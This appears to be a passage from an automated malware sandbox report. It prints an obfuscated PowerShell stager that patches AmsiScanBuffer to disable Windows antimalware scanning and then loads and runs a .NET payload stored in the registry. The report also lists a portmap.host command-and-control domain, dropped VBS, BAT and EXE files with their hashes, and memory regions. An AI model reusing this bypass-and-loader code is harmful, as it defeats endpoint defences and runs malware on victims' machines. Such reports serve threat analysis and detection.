+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+'BySig'+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$oMmkqHfKTl,$lJwFyNKTsaMIHN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $IBqrmOULbXN.CreateType();}$tDVGJWLUaLdiM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$FpkKdOZrIBKZgz=$tDVGJWLUaLdiM.GetMethod('G'+'e'+'t'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WxQgSTibJFedvuWSMTN=ogzDqwWhdUBf @([String])([IntPtr]);$yGNuXBkrDmYeGzLzrrKQIW=ogzDqwWhdUBf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EbRXADJQnTF=$tDVGJWLUaLdiM.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+'l')));$LHdjCHEWPokIUh=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$EbRXADJQnTF,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+'y'+''+'A'+'')));$uiGfRpGAzoYjWCjvT=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$EbRXADJQnTF,[Object]('Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$TXskibr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LHdjCHEWPokIUh,$WxQgSTibJFedvuWSMTN).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+''+[Char](108)+'');$VTgUgtvVPMJtFwuIa=$FpkKdOZrIBKZgz.Invoke($Null,@([Object]$TXskibr,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'f'+'e'+''+'r'+'')));$UprnTBlnVv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uiGfRpGAzoYjWCjvT,$yGNuXBkrDmYeGzLzrrKQIW).Invoke($VTgUgtvVPMJtFwuIa,[uint32]8,4,[ref]$UprnTBlnVv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VTgUgtvVPMJtFwuIa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uiGfRpGAzoYjWCjvT,$yGNuXBkrDmYeGzLzrrKQIW).Invoke($VTgUgtvVPMJtFwuIa,[uint32]8,0x20,[ref]$UprnTBlnVv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'s'+'xrs'+'t'+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{44ee5488-4e53-4931-b851-64243896b9ac}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
Files
memory/2680-2-0x0000000073ADE000-0x0000000073ADF000-memory.dmp
memory/2680-3-0x0000000000E10000-0x0000000000E46000-memory.dmp
memory/2680-4-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/2680-5-0x0000000006E60000-0x0000000007488000-memory.dmp
memory/2680-6-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/2680-7-0x0000000006C70000-0x0000000006C92000-memory.dmp
memory/2680-8-0x0000000006D10000-0x0000000006D76000-memory.dmp
memory/2680-9-0x0000000006D80000-0x0000000006DE6000-memory.dmp
memory/2680-10-0x0000000007640000-0x0000000007990000-memory.dmp
memory/2680-13-0x0000000007A10000-0x0000000007A2C000-memory.dmp
memory/2680-14-0x0000000007F10000-0x0000000007F5B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ah2ichmp.2xy.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2680-33-0x0000000007E70000-0x0000000007EAC000-memory.dmp
memory/2680-64-0x0000000008D30000-0x0000000008DA6000-memory.dmp
memory/2680-67-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/2680-70-0x0000000009EA0000-0x000000000A518000-memory.dmp
memory/2680-71-0x0000000009840000-0x000000000985A000-memory.dmp
memory/2680-72-0x0000000000680000-0x0000000000688000-memory.dmp
memory/2680-73-0x0000000009950000-0x00000000099BE000-memory.dmp
memory/2680-74-0x000000000CA20000-0x000000000CF1E000-memory.dmp
memory/1356-84-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/1356-85-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/1356-102-0x0000000009000000-0x0000000009033000-memory.dmp
memory/1356-104-0x0000000008FE0000-0x0000000008FFE000-memory.dmp
memory/1356-103-0x00000000706B0000-0x00000000706FB000-memory.dmp
memory/1356-109-0x0000000009180000-0x0000000009225000-memory.dmp
memory/1356-110-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/1356-111-0x0000000009320000-0x00000000093B4000-memory.dmp
memory/1356-203-0x0000000073AD0000-0x00000000741BE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | a8641a2f94483f12ba0cad0cf02a3bc7 |
| SHA1 | fae3e6835336154b90503431279eef6c52a289d2 |
| SHA256 | ce70f1a4578b12964dde1e1eef8cb1948847230bf3458dfd41f8e2c32c71c24d |
| SHA512 | 5c92772168461d15ef6ed7b5ab2103cb63acfb1540d2d56610bbdd4a3494e866e47a225f6c7a42fa31f9170495dcddfad24533711289a6c3bfa5857a376b3e62 |
C:\Users\Admin\AppData\Roaming\Windows_Log_605.vbs
| MD5 | 22af76759682583a4b286a2166ec9c50 |
| SHA1 | 21593b845aa26231032b8ced8106efb2bda0b76a |
| SHA256 | 2c19089c8dc78c30ad2ee4b6886388522e88e13a225f8f8e3c80fcf4f25174cd |
| SHA512 | 949201b481a13d0ca0987e93ba0ddc4bd892e2e39f8e477ebad95969f3c0791fa2977d87edf1a3a656dfd1fc4697bd884c83cd962987c1dcd25984110689bf09 |
C:\Users\Admin\AppData\Roaming\Windows_Log_605.bat
| MD5 | d4c582bb5890af020c110f2b1de1d9db |
| SHA1 | 04c25b115c7bdaced94746c4acf9b5245f064ea0 |
| SHA256 | d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c |
| SHA512 | 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 801a886229d3c749abfa4dad18e58318 |
| SHA1 | 6720d751bc76febaff82068534364c9942040594 |
| SHA256 | 824bc6a9a47bdc85ee06f9dc03d986b35a1c97921550d58adc7f89c51725df40 |
| SHA512 | 37d578279f39434bf2b0592d04b8406b6718bcae0f4db590ba1ca8b1f5b8dd10541b37b3ee7099bf91234f5f75e0e1667ee54f5a89fc8acf8bc82baf05d738a4 |
memory/1436-276-0x0000000009F30000-0x0000000009F8E000-memory.dmp
memory/1436-277-0x000000000A320000-0x000000000A3B2000-memory.dmp
memory/2680-279-0x0000000073AD0000-0x00000000741BE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b489b7d9efc807fb9583f21f39327fc2 |
| SHA1 | 1ee42e6c08cd0a51d5c763c6b8771c004b962865 |
| SHA256 | 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579 |
| SHA512 | 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e |
memory/1436-288-0x0000000006D40000-0x0000000006D52000-memory.dmp
memory/3752-293-0x000001E233840000-0x000001E233862000-memory.dmp
memory/3752-296-0x000001E233B20000-0x000001E233B96000-memory.dmp
memory/1436-298-0x000000000A030000-0x000000000A06E000-memory.dmp
memory/1436-311-0x000000000A0A0000-0x000000000A0AA000-memory.dmp
memory/3752-319-0x000001E233AE0000-0x000001E233B0A000-memory.dmp
memory/3752-321-0x00007FF8D8DF0000-0x00007FF8D8E9E000-memory.dmp
memory/208-325-0x0000000140000000-0x0000000140008000-memory.dmp
memory/208-324-0x0000000140000000-0x0000000140008000-memory.dmp
memory/208-330-0x0000000140000000-0x0000000140008000-memory.dmp
memory/208-323-0x0000000140000000-0x0000000140008000-memory.dmp
memory/208-322-0x0000000140000000-0x0000000140008000-memory.dmp
memory/3752-320-0x00007FF8DB530000-0x00007FF8DB70B000-memory.dmp
memory/208-332-0x00007FF8D8DF0000-0x00007FF8D8E9E000-memory.dmp
memory/208-331-0x00007FF8DB530000-0x00007FF8DB70B000-memory.dmp
memory/208-333-0x0000000140000000-0x0000000140008000-memory.dmp
memory/568-336-0x000002201FBD0000-0x000002201FBF5000-memory.dmp
memory/568-337-0x000002201FC00000-0x000002201FC2A000-memory.dmp
memory/568-344-0x00007FF89B5C0000-0x00007FF89B5D0000-memory.dmp
memory/568-338-0x000002201FC00000-0x000002201FC2A000-memory.dmp
memory/568-343-0x000002201FC00000-0x000002201FC2A000-memory.dmp
memory/636-348-0x000002D90F640000-0x000002D90F66A000-memory.dmp
memory/636-354-0x00007FF89B5C0000-0x00007FF89B5D0000-memory.dmp
memory/636-353-0x000002D90F640000-0x000002D90F66A000-memory.dmp
memory/732-364-0x00007FF89B5C0000-0x00007FF89B5D0000-memory.dmp
memory/904-374-0x00007FF89B5C0000-0x00007FF89B5D0000-memory.dmp
memory/996-384-0x00007FF89B5C0000-0x00007FF89B5D0000-memory.dmp
memory/996-383-0x0000020B912B0000-0x0000020B912DA000-memory.dmp
memory/996-378-0x0000020B912B0000-0x0000020B912DA000-memory.dmp
memory/904-373-0x000001F5393D0000-0x000001F5393FA000-memory.dmp
memory/904-368-0x000001F5393D0000-0x000001F5393FA000-memory.dmp
memory/732-363-0x000002605B5C0000-0x000002605B5EA000-memory.dmp
memory/732-358-0x000002605B5C0000-0x000002605B5EA000-memory.dmp